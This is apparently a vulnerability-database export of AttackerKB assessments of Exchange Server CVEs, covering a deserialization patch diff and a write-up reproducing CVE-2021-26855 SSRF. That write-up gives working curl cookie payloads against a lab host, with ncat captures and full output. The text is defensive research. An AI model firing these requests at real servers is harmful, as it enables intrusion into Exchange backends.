objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\treturn UMRecipient.Factory.FromADRecipient<UMRecipient>(this.CreateADRecipientFromObjectGuid(objectGuid, tenantGuid));\n \t\t}\n \n \t\tprotected ADRecipient CreateADRecipientFromObjectGuid(Guid objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\tif (objectGuid == Guid.Empty)\n \t\t\t{\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(\"ObjectGuid is empty\");\n \t\t\t}\n \t\t\tADRecipient adrecipient = ADRecipientLookupFactory.CreateFromTenantGuid(tenantGuid).LookupByObjectId(new ADObjectId(objectGuid));\n \t\t\tif (adrecipient == null)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Could not find recipient {0}\", new object[]\n \t\t\t\t{\n \t\t\t\t\tobjectGuid.ToString()\n \t\t\t\t});\n \t\t\t\tthrow new InvalidObjectGuidException(objectGuid.ToString());\n \t\t\t}\n \t\t\treturn adrecipient;\n \t\t}\n \n \t\tprotected UMDialPlan InitializeCallerIdAndTryGetDialPlan(UMRecipient recipient)\n \t\t{\n \t\t\tUMDialPlan umdialPlan = null;\n \t\t\tif (this.CallerId.UriType == UMUriType.E164 && recipient.ADRecipient.UMRecipientDialPlanId != null)\n \t\t\t{\n \t\t\t\tumdialPlan = ADSystemConfigurationLookupFactory.CreateFromADRecipient(recipient.ADRecipient).GetDialPlanFromId(recipient.ADRecipient.UMRecipientDialPlanId);\n \t\t\t\tif (umdialPlan != null && umdialPlan.CountryOrRegionCode != null)\n \t\t\t\t{\n \t\t\t\t\tthis.helper.CallerId = this.helper.CallerId.Clone(umdialPlan);\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn umdialPlan;\n \t\t}\n \n \t\tprotected string GetMailboxServerIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.ServerLegacyDN;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"af360a7e-e6d4-494a-ac69-6ae14896d16b\";\n \t\t}\n \n \t\tprotected string GetRecipientIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.DistinguishedName;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"455e5330-ce1f-48d1-b6b1-2e318d2ff2c4\";\n \t\t}\n \n \t\tprivate MessageItem messageToSubmit;\n \n \t\tprivate SubmissionHelper helper;\n \n \t\tprivate string messageType;\n \n \t\tprivate CultureInfo cultureInfo;\n \n \t\tprivate string headerFileName;\n \n \t\tprivate int processedCount;\n \n \t\tprivate string messageID;\n \n \t\tprivate ExDateTime sentTime;\n +\n +\t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n +\t\t{\n +\t\t\ttypeof(Version),\n +\t\t\ttypeof(Guid),\n +\t\t\ttypeof(PropTag),\n +\t\t\ttypeof(ContactInfo),\n +\t\t\ttypeof(ADContactInfo),\n +\t\t\ttypeof(FoundByType),\n +\t\t\ttypeof(ADUser),\n +\t\t\ttypeof(ADPropertyBag),\n +\t\t\ttypeof(ValidationError),\n +\t\t\ttypeof(ADPropertyDefinition),\n +\t\t\ttypeof(ADObjectId),\n +\t\t\ttypeof(ExchangeObjectVersion),\n +\t\t\ttypeof(ExchangeBuild),\n +\t\t\ttypeof(MultiValuedProperty<string>),\n +\t\t\ttypeof(LocalizedString),\n +\t\t\ttypeof(ProxyAddressCollection),\n +\t\t\ttypeof(SmtpAddress),\n +\t\t\ttypeof(RecipientDisplayType),\n +\t\t\ttypeof(RecipientTypeDetails),\n +\t\t\ttypeof(ElcMailboxFlags),\n +\t\t\ttypeof(UserAccountControlFlags),\n +\t\t\ttypeof(ObjectState),\n +\t\t\ttypeof(DirectoryBackendType),\n +\t\t\ttypeof(MServPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinitionFlags),\n +\t\t\ttypeof(OrganizationId),\n +\t\t\ttypeof(PartitionId),\n +\t\t\ttypeof(SmtpProxyAddress),\n +\t\t\ttypeof(SmtpProxyAddressPrefix),\n +\t\t\ttypeof(ByteQuantifiedSize),\n +\t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n +\t\t\ttypeof(List<ValidationError>),\n +\t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n +\t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n +\t\t\ttypeof(StoreObjectId),\n +\t\t\ttypeof(StoreObjectType),\n +\t\t\ttypeof(EntryIdProvider),\n +\t\t\ttypeof(SimpleContactInfoBase),\n +\t\t\ttypeof(MultipleResolvedContactInfo),\n +\t\t\ttypeof(CallerNameDisplayContactInfo),\n +\t\t\ttypeof(PersonalContactInfo),\n +\t\t\ttypeof(DefaultContactInfo),\n +\t\t\ttypeof(UMDialPlan),\n +\t\t\ttypeof(UMEnabledFlags),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n +\t\t\ttypeof(DialByNamePrimaryEnum),\n +\t\t\ttypeof(DialByNameSecondaryEnum),\n +\t\t\ttypeof(AudioCodecEnum),\n +\t\t\ttypeof(UMUriType),\n +\t\t\ttypeof(UMSubscriberType),\n +\t\t\ttypeof(UMGlobalCallRoutingScheme),\n +\t\t\ttypeof(UMVoIPSecurityType),\n +\t\t\ttypeof(SystemFlagsEnum),\n +\t\t\ttypeof(EumProxyAddress),\n +\t\t\ttypeof(EumProxyAddressPrefix)\n +\t\t};\n \t}\n }\n \n\nThe patch appears to add and use a typed allowlist for deserialization of a voicemail\u2019s contact info, which is found in a header file alongside the voicemail itself. ~~Other seemingly unprotected deserializations can be seen in the same class.~~ (I think it\u2019s just XML parsing.) My suspicion is that [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) or [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) could be used to write a malicious header file to `C:\\Program Files\\Microsoft\\Exchange Server\\V15\\UnifiedMessaging\\voicemail`, but it\u2019s entirely possible a crafted voicemail could be sent instead. While I haven\u2019t developed a PoC yet, I do have a good idea how to, assuming the patch analysis is correct. Better-resourced attackers should be able to exploit this issue in considerably less time.\n\nThe specifically patched code can be seen below:\n \n \n [snip]\n \t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tException ex = null;\n \t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n \t\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tfinally\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n \t\t\t\t\t\t\t\t\t\t\t\t\tex\n \t\t\t\t\t\t\t\t\t\t\t\t});\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n [snip]\n \n \n \n [snip]\n \t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n \t\t{\n \t\t\ttypeof(Version),\n \t\t\ttypeof(Guid),\n \t\t\ttypeof(PropTag),\n \t\t\ttypeof(ContactInfo),\n \t\t\ttypeof(ADContactInfo),\n \t\t\ttypeof(FoundByType),\n \t\t\ttypeof(ADUser),\n \t\t\ttypeof(ADPropertyBag),\n \t\t\ttypeof(ValidationError),\n \t\t\ttypeof(ADPropertyDefinition),\n \t\t\ttypeof(ADObjectId),\n \t\t\ttypeof(ExchangeObjectVersion),\n \t\t\ttypeof(ExchangeBuild),\n \t\t\ttypeof(MultiValuedProperty<string>),\n \t\t\ttypeof(LocalizedString),\n \t\t\ttypeof(ProxyAddressCollection),\n \t\t\ttypeof(SmtpAddress),\n \t\t\ttypeof(RecipientDisplayType),\n \t\t\ttypeof(RecipientTypeDetails),\n \t\t\ttypeof(ElcMailboxFlags),\n \t\t\ttypeof(UserAccountControlFlags),\n \t\t\ttypeof(ObjectState),\n \t\t\ttypeof(DirectoryBackendType),\n \t\t\ttypeof(MServPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinitionFlags),\n \t\t\ttypeof(OrganizationId),\n \t\t\ttypeof(PartitionId),\n \t\t\ttypeof(SmtpProxyAddress),\n \t\t\ttypeof(SmtpProxyAddressPrefix),\n \t\t\ttypeof(ByteQuantifiedSize),\n \t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n \t\t\ttypeof(List<ValidationError>),\n \t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n \t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n \t\t\ttypeof(StoreObjectId),\n \t\t\ttypeof(StoreObjectType),\n \t\t\ttypeof(EntryIdProvider),\n \t\t\ttypeof(SimpleContactInfoBase),\n \t\t\ttypeof(MultipleResolvedContactInfo),\n \t\t\ttypeof(CallerNameDisplayContactInfo),\n \t\t\ttypeof(PersonalContactInfo),\n \t\t\ttypeof(DefaultContactInfo),\n \t\t\ttypeof(UMDialPlan),\n \t\t\ttypeof(UMEnabledFlags),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n \t\t\ttypeof(DialByNamePrimaryEnum),\n \t\t\ttypeof(DialByNameSecondaryEnum),\n \t\t\ttypeof(AudioCodecEnum),\n \t\t\ttypeof(UMUriType),\n \t\t\ttypeof(UMSubscriberType),\n \t\t\ttypeof(UMGlobalCallRoutingScheme),\n \t\t\ttypeof(UMVoIPSecurityType),\n \t\t\ttypeof(SystemFlagsEnum),\n \t\t\ttypeof(EumProxyAddress),\n \t\t\ttypeof(EumProxyAddressPrefix)\n \t\t};\n [snip]\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26857", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "href": "https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:40:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26858", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "href": "https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:40:36", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 09, 2021 7:01am UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 